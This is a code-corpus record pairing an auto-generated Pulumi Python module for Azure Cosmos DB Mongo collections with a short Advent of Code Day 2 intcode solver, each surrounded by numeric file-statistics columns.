| 0
| 0
| 0
| 1
| 0.078431
| false
| 0
| 0.058824
| 0
| 0.215686
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2971ce4b79d6bac67495797eb58b18e7a360347a
| 35,816
|
py
|
Python
|
sdk/python/pulumi_azure/cosmosdb/mongo_collection.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/cosmosdb/mongo_collection.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/cosmosdb/mongo_collection.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MongoCollectionArgs', 'MongoCollection']
@pulumi.input_type
class MongoCollectionArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
database_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']] = None,
default_ttl_seconds: Optional[pulumi.Input[int]] = None,
indices: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
shard_key: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a MongoCollection resource.
:param pulumi.Input[str] database_name: The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input['MongoCollectionAutoscaleSettingsArgs'] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
:param pulumi.Input[int] default_ttl_seconds: The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
:param pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]] indices: One or more `index` blocks as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
:param pulumi.Input[str] shard_key: The name of the key to partition on for sharding. There must not be any other unique index keys.
:param pulumi.Input[int] throughput: The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if analytical_storage_ttl is not None:
pulumi.set(__self__, "analytical_storage_ttl", analytical_storage_ttl)
if autoscale_settings is not None:
pulumi.set(__self__, "autoscale_settings", autoscale_settings)
if default_ttl_seconds is not None:
pulumi.set(__self__, "default_ttl_seconds", default_ttl_seconds)
if indices is not None:
pulumi.set(__self__, "indices", indices)
if name is not None:
pulumi.set(__self__, "name", name)
if shard_key is not None:
pulumi.set(__self__, "shard_key", shard_key)
if throughput is not None:
pulumi.set(__self__, "throughput", throughput)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="analyticalStorageTtl")
def analytical_storage_ttl(self) -> Optional[pulumi.Input[int]]:
"""
The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "analytical_storage_ttl")
@analytical_storage_ttl.setter
def analytical_storage_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "analytical_storage_ttl", value)
@property
@pulumi.getter(name="autoscaleSettings")
def autoscale_settings(self) -> Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']]:
"""
An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
"""
return pulumi.get(self, "autoscale_settings")
@autoscale_settings.setter
def autoscale_settings(self, value: Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']]):
pulumi.set(self, "autoscale_settings", value)
@property
@pulumi.getter(name="defaultTtlSeconds")
def default_ttl_seconds(self) -> Optional[pulumi.Input[int]]:
"""
The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
"""
return pulumi.get(self, "default_ttl_seconds")
@default_ttl_seconds.setter
def default_ttl_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_ttl_seconds", value)
@property
@pulumi.getter
def indices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]]:
"""
One or more `index` blocks as defined below.
"""
return pulumi.get(self, "indices")
@indices.setter
def indices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]]):
pulumi.set(self, "indices", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="shardKey")
def shard_key(self) -> Optional[pulumi.Input[str]]:
"""
The name of the key to partition on for sharding. There must not be any other unique index keys.
"""
return pulumi.get(self, "shard_key")
@shard_key.setter
def shard_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "shard_key", value)
@property
@pulumi.getter
def throughput(self) -> Optional[pulumi.Input[int]]:
"""
The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
"""
return pulumi.get(self, "throughput")
@throughput.setter
def throughput(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throughput", value)
@pulumi.input_type
class _MongoCollectionState:
def __init__(__self__, *,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl_seconds: Optional[pulumi.Input[int]] = None,
indices: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shard_key: Optional[pulumi.Input[str]] = None,
system_indexes: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionSystemIndexArgs']]]] = None,
throughput: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering MongoCollection resources.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input['MongoCollectionAutoscaleSettingsArgs'] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
:param pulumi.Input[str] database_name: The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] default_ttl_seconds: The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
:param pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]] indices: One or more `index` blocks as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] shard_key: The name of the key to partition on for sharding. There must not be any other unique index keys.
:param pulumi.Input[Sequence[pulumi.Input['MongoCollectionSystemIndexArgs']]] system_indexes: One or more `system_indexes` blocks as defined below.
:param pulumi.Input[int] throughput: The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
"""
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if analytical_storage_ttl is not None:
pulumi.set(__self__, "analytical_storage_ttl", analytical_storage_ttl)
if autoscale_settings is not None:
pulumi.set(__self__, "autoscale_settings", autoscale_settings)
if database_name is not None:
pulumi.set(__self__, "database_name", database_name)
if default_ttl_seconds is not None:
pulumi.set(__self__, "default_ttl_seconds", default_ttl_seconds)
if indices is not None:
pulumi.set(__self__, "indices", indices)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if shard_key is not None:
pulumi.set(__self__, "shard_key", shard_key)
if system_indexes is not None:
pulumi.set(__self__, "system_indexes", system_indexes)
if throughput is not None:
pulumi.set(__self__, "throughput", throughput)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="analyticalStorageTtl")
def analytical_storage_ttl(self) -> Optional[pulumi.Input[int]]:
"""
The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "analytical_storage_ttl")
@analytical_storage_ttl.setter
def analytical_storage_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "analytical_storage_ttl", value)
@property
@pulumi.getter(name="autoscaleSettings")
def autoscale_settings(self) -> Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']]:
"""
An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
"""
return pulumi.get(self, "autoscale_settings")
@autoscale_settings.setter
def autoscale_settings(self, value: Optional[pulumi.Input['MongoCollectionAutoscaleSettingsArgs']]):
pulumi.set(self, "autoscale_settings", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter(name="defaultTtlSeconds")
def default_ttl_seconds(self) -> Optional[pulumi.Input[int]]:
"""
The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
"""
return pulumi.get(self, "default_ttl_seconds")
@default_ttl_seconds.setter
def default_ttl_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_ttl_seconds", value)
@property
@pulumi.getter
def indices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]]:
"""
One or more `index` blocks as defined below.
"""
return pulumi.get(self, "indices")
@indices.setter
def indices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionIndexArgs']]]]):
pulumi.set(self, "indices", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="shardKey")
def shard_key(self) -> Optional[pulumi.Input[str]]:
"""
The name of the key to partition on for sharding. There must not be any other unique index keys.
"""
return pulumi.get(self, "shard_key")
@shard_key.setter
def shard_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "shard_key", value)
@property
@pulumi.getter(name="systemIndexes")
def system_indexes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionSystemIndexArgs']]]]:
"""
One or more `system_indexes` blocks as defined below.
"""
return pulumi.get(self, "system_indexes")
@system_indexes.setter
def system_indexes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MongoCollectionSystemIndexArgs']]]]):
pulumi.set(self, "system_indexes", value)
@property
@pulumi.getter
def throughput(self) -> Optional[pulumi.Input[int]]:
"""
The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
"""
return pulumi.get(self, "throughput")
@throughput.setter
def throughput(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throughput", value)
class MongoCollection(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input[pulumi.InputType['MongoCollectionAutoscaleSettingsArgs']]] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl_seconds: Optional[pulumi.Input[int]] = None,
indices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionIndexArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shard_key: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Manages a Mongo Collection within a Cosmos DB Account.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_account = azure.cosmosdb.get_account(name="tfex-cosmosdb-account",
resource_group_name="tfex-cosmosdb-account-rg")
example_mongo_database = azure.cosmosdb.MongoDatabase("exampleMongoDatabase",
resource_group_name=example_account.resource_group_name,
account_name=example_account.name)
example_mongo_collection = azure.cosmosdb.MongoCollection("exampleMongoCollection",
resource_group_name=example_account.resource_group_name,
account_name=example_account.name,
database_name=example_mongo_database.name,
default_ttl_seconds=777,
shard_key="uniqueKey",
throughput=400,
indices=[azure.cosmosdb.MongoCollectionIndexArgs(
keys=["_id"],
unique=True,
)])
```
## Import
CosmosDB Mongo Collection can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:cosmosdb/mongoCollection:MongoCollection collection1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.DocumentDB/databaseAccounts/account1/mongodbDatabases/db1/collections/collection1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input[pulumi.InputType['MongoCollectionAutoscaleSettingsArgs']] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
:param pulumi.Input[str] database_name: The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] default_ttl_seconds: The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionIndexArgs']]]] indices: One or more `index` blocks as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] shard_key: The name of the key to partition on for sharding. There must not be any other unique index keys.
:param pulumi.Input[int] throughput: The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MongoCollectionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Mongo Collection within a Cosmos DB Account.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_account = azure.cosmosdb.get_account(name="tfex-cosmosdb-account",
resource_group_name="tfex-cosmosdb-account-rg")
example_mongo_database = azure.cosmosdb.MongoDatabase("exampleMongoDatabase",
resource_group_name=example_account.resource_group_name,
account_name=example_account.name)
example_mongo_collection = azure.cosmosdb.MongoCollection("exampleMongoCollection",
resource_group_name=example_account.resource_group_name,
account_name=example_account.name,
database_name=example_mongo_database.name,
default_ttl_seconds=777,
shard_key="uniqueKey",
throughput=400,
indices=[azure.cosmosdb.MongoCollectionIndexArgs(
keys=["_id"],
unique=True,
)])
```
## Import
CosmosDB Mongo Collection can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:cosmosdb/mongoCollection:MongoCollection collection1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.DocumentDB/databaseAccounts/account1/mongodbDatabases/db1/collections/collection1
```
:param str resource_name: The name of the resource.
:param MongoCollectionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MongoCollectionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input[pulumi.InputType['MongoCollectionAutoscaleSettingsArgs']]] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl_seconds: Optional[pulumi.Input[int]] = None,
indices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionIndexArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shard_key: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MongoCollectionArgs.__new__(MongoCollectionArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["analytical_storage_ttl"] = analytical_storage_ttl
__props__.__dict__["autoscale_settings"] = autoscale_settings
if database_name is None and not opts.urn:
raise TypeError("Missing required property 'database_name'")
__props__.__dict__["database_name"] = database_name
__props__.__dict__["default_ttl_seconds"] = default_ttl_seconds
__props__.__dict__["indices"] = indices
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["shard_key"] = shard_key
__props__.__dict__["throughput"] = throughput
__props__.__dict__["system_indexes"] = None
super(MongoCollection, __self__).__init__(
'azure:cosmosdb/mongoCollection:MongoCollection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input[pulumi.InputType['MongoCollectionAutoscaleSettingsArgs']]] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl_seconds: Optional[pulumi.Input[int]] = None,
indices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionIndexArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shard_key: Optional[pulumi.Input[str]] = None,
system_indexes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionSystemIndexArgs']]]]] = None,
throughput: Optional[pulumi.Input[int]] = None) -> 'MongoCollection':
"""
Get an existing MongoCollection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input[pulumi.InputType['MongoCollectionAutoscaleSettingsArgs']] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
:param pulumi.Input[str] database_name: The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] default_ttl_seconds: The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionIndexArgs']]]] indices: One or more `index` blocks as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] shard_key: The name of the key to partition on for sharding. There must not be any other unique index keys.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionSystemIndexArgs']]]] system_indexes: One or more `system_indexes` blocks as defined below.
:param pulumi.Input[int] throughput: The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MongoCollectionState.__new__(_MongoCollectionState)
__props__.__dict__["account_name"] = account_name
__props__.__dict__["analytical_storage_ttl"] = analytical_storage_ttl
__props__.__dict__["autoscale_settings"] = autoscale_settings
__props__.__dict__["database_name"] = database_name
__props__.__dict__["default_ttl_seconds"] = default_ttl_seconds
__props__.__dict__["indices"] = indices
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["shard_key"] = shard_key
__props__.__dict__["system_indexes"] = system_indexes
__props__.__dict__["throughput"] = throughput
return MongoCollection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Output[str]:
return pulumi.get(self, "account_name")
@property
@pulumi.getter(name="analyticalStorageTtl")
def analytical_storage_ttl(self) -> pulumi.Output[Optional[int]]:
"""
The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "analytical_storage_ttl")
@property
@pulumi.getter(name="autoscaleSettings")
def autoscale_settings(self) -> pulumi.Output[Optional['outputs.MongoCollectionAutoscaleSettings']]:
"""
An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
"""
return pulumi.get(self, "autoscale_settings")
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Output[str]:
"""
The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@property
@pulumi.getter(name="defaultTtlSeconds")
def default_ttl_seconds(self) -> pulumi.Output[Optional[int]]:
"""
The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
"""
return pulumi.get(self, "default_ttl_seconds")
@property
@pulumi.getter
def indices(self) -> pulumi.Output[Optional[Sequence['outputs.MongoCollectionIndex']]]:
"""
One or more `index` blocks as defined below.
"""
return pulumi.get(self, "indices")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="shardKey")
def shard_key(self) -> pulumi.Output[Optional[str]]:
"""
The name of the key to partition on for sharding. There must not be any other unique index keys.
"""
return pulumi.get(self, "shard_key")
@property
@pulumi.getter(name="systemIndexes")
def system_indexes(self) -> pulumi.Output[Sequence['outputs.MongoCollectionSystemIndex']]:
"""
One or more `system_indexes` blocks as defined below.
"""
return pulumi.get(self, "system_indexes")
@property
@pulumi.getter
def throughput(self) -> pulumi.Output[int]:
"""
The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
"""
return pulumi.get(self, "throughput")
| 54.680916
| 346
| 0.685113
| 4,425
| 35,816
| 5.363616
| 0.057853
| 0.071838
| 0.068046
| 0.03337
| 0.913879
| 0.901154
| 0.894287
| 0.87697
| 0.864667
| 0.855482
| 0
| 0.005386
| 0.22247
| 35,816
| 654
| 347
| 54.764526
| 0.846632
| 0.415624
| 0
| 0.764228
| 1
| 0
| 0.142363
| 0.053069
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162602
| false
| 0.00271
| 0.01897
| 0.00813
| 0.279133
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
46597ed04492dd815f62cc568dcf91dc16c19591
| 1,453
|
py
|
Python
|
adventofcode/day2.py
|
Imipenem/Competitive_Prog_with_Python
|
64f64c733b591acd8f75a36efbb66cca3b58f05f
|
[
"MIT"
] | null | null | null |
adventofcode/day2.py
|
Imipenem/Competitive_Prog_with_Python
|
64f64c733b591acd8f75a36efbb66cca3b58f05f
|
[
"MIT"
] | null | null | null |
adventofcode/day2.py
|
Imipenem/Competitive_Prog_with_Python
|
64f64c733b591acd8f75a36efbb66cca3b58f05f
|
[
"MIT"
] | null | null | null |
def opcodeI() -> int:
with open("/home/thelichking/Desktop/adventOfCode/Day2/Opcodes",'r' ) as file:
lines = list(map(int,file.readline().replace("\n","").split(",")))
lines[1],lines[2] = 1,0
idx = 0
while idx < len(lines):
cur_opcode = lines[idx]
if cur_opcode == 99: return lines[0]
else:
if cur_opcode == 1: lines[lines[idx+3]] = lines[lines[idx+1]] + lines[lines[idx+2]]
elif cur_opcode == 2: lines[lines[idx+3]] = lines[lines[idx+1]] * lines[lines[idx+2]]
idx += 4
return lines[0]
def opcodeII(noun, verb) -> int:
with open("/home/thelichking/Desktop/adventOfCode/Day2/Opcodes",'r' ) as file:
lines = list(map(int,file.readline().replace("\n","").split(",")))
lines[1],lines[2] = noun,verb
idx = 0
while idx < len(lines):
cur_opcode = lines[idx]
if cur_opcode == 99: return lines[0]
else:
if cur_opcode == 1: lines[lines[idx+3]] = lines[lines[idx+1]] + lines[lines[idx+2]]
elif cur_opcode == 2: lines[lines[idx+3]] = lines[lines[idx+1]] * lines[lines[idx+2]]
idx += 4
return lines[0]
def inputII() -> int:
for i in range(100):
for j in range(100):
if opcodeII(j,i) == 19690720:
return 100*j + i
if __name__=="__main__":
print(inputII())
| 32.288889
| 101
| 0.52512
| 197
| 1,453
| 3.791878
| 0.253807
| 0.149933
| 0.208835
| 0.11245
| 0.829987
| 0.829987
| 0.829987
| 0.829987
| 0.829987
| 0.829987
| 0
| 0.052579
